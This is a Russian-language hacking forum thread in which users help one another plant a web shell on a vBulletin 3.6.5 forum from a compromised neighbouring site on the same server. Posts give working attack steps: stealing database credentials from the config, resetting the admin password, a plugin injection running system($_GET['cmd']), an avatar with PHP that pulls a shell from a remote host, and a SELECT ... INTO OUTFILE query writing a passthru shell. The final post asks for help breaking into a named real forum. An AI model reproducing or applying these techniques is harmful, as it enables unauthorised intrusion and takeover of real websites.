vBulletin® 3.6.5 взлом
 

привет всем тут у меня такой вопрос имею доступ к db форума vBulletin® 3.6.5, через шел находящийся на этом же сервере но на другом сайте как мне залить шел на данный форум зная какие директории на нем находятся. Залить шел на взломаный сайт от имени того пользователя у меня не хватает прав но дубаю через базу данных должно хватить прав на запись потому что запрос будет производиться от имени того пользователя чья база данных

Ну ты как-то узнал имя и пароль пользователя базы данных :) Значит есть права на чтение файлов. Вероятно, что на просмотр листинга тоже. А если и нет, попробуй через базу сменить пароль админу или создать нового админа и попробуй залить шелл. ХЗ можно ли в этой версии залить шелл из админки

дело в том что чтение файлов есть а вот как залить шел через запрос я незная шел у меня s99shell нужно запрос сделать что бы после него на сайте создался шел с заданным содержанием

Не понимаю что тут сложного. Если очень надо, могу тебе шелл залить :) Пиши в ПМ

дело в том что сайт друга да и самому на будущее надо знать как это делается у меня не сложный вопрос. думаю людям будет нетрудно составитьзапрос который заливает шел через базу данных сам в мускуле я не силен поэтому и прошу помощи.
просто есть желание снять по этому поводу видео а то что я приконнектился к базе и сменил пасс админа это больно уж примитивно. Сайт кстати тоже по хакерской тематике

Так у тебя шелл или только доступ к базе?

у меня шел есть но на другом сайте. на серваке локальный инклуд поэтому я могу читать файлы других пользователей. и могу приконнектиться к базе данных

я тож нече непойму ты щелл на сервак залил ? и неможешь его запустить чтоль?

Если это действительно инклуд, а не читалка, то ты можешь проинклудить что-нибудь, аватару, например. Или логи апача.

Как я понял но тот сайт на который хочешь залить шелл стоит vBulletin® 3.6.5 и у тебя есть возможность читать его дириктории, посмотри в конфиге пасс и логин на конект к мускулю, конется к мускулю, выташи пасс админа и побрудь или поменяй на время на свой, залей шелл через админку и все.

Проще так
только принклюдить шелл через аватару вдруг доступ к дб, только лх.

кто знает в какие диры можно заливать файлы в этом форуме. это бы тоже пригодилося

залей аву с
<?php copy("http://www.site/shell.txt","them.php"); ?>

и инклюдь ее

шел через админку это как то уже наиграно хочется так как я пояснял выше

У тебя же есть шелл на сайте по "соседству", посмотри им, хз что там админ запретил а что нет.

инклуд находится не на этом сайте а на другом

Я что то запутался..
у тебя на жертве, есть инлюд или шелл? или тока пасс от дб??

на соседнем сайте у меня полный доступ ко всем файлам и редактирование тоже на этом же нет ни диры для записи ни редактирования файлов по крайне мере я ее не нашелдиры для записи

у меня шел на соседнем сайте я могу читать соседние сайты но доступа на запись нету вот в чем проблема

Че ты тупиш, я тебе говорю посмотри с помошью шелла, что там на соседнем сайте, например -rw-r--r--.
Стукани в аську, если хочешь посмотрю.

-rw-r--r--. да такие права но они выделины белым а не зееленым редактировать файлы нельзя

Твой кролик пишет - произнеси на англиском 1000 раз, тогда появится возможность и записи и чтения.

флуд тут не нужен

если у тебя есть доступ к бд пробуй залить файл через into outfile, если не получится, попробуй извлечь логин и пасс рута из mysql.user, разшифруешь, подключишься к бд и снова попробуешь через into outfile

пробовал залить шел так
1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: Vbulletin: Справка - faq_complete
Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]);
4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда

но ни чего не выходит смаилы тоже отдыхают у кого есть еще предложения

хоть кто то понял о чем я говорю какой запрос в базе надо выполнить что бы залить шел

select '<?php @passthru($_GET[cmd]); ?>' into outfile '/fullpatch/shell.php' from table
директория должна быть открыта на запись [-rwxrwxrwx]
from table иногда нужно иногда нет, table любая таблица

google на что, об этом не раз писали и видео много

народ помгаите взломать форум http://www.avatar-forums.com/ мне срочно нужно его ломануть или хотяб посмотрите может найдёте какие дыры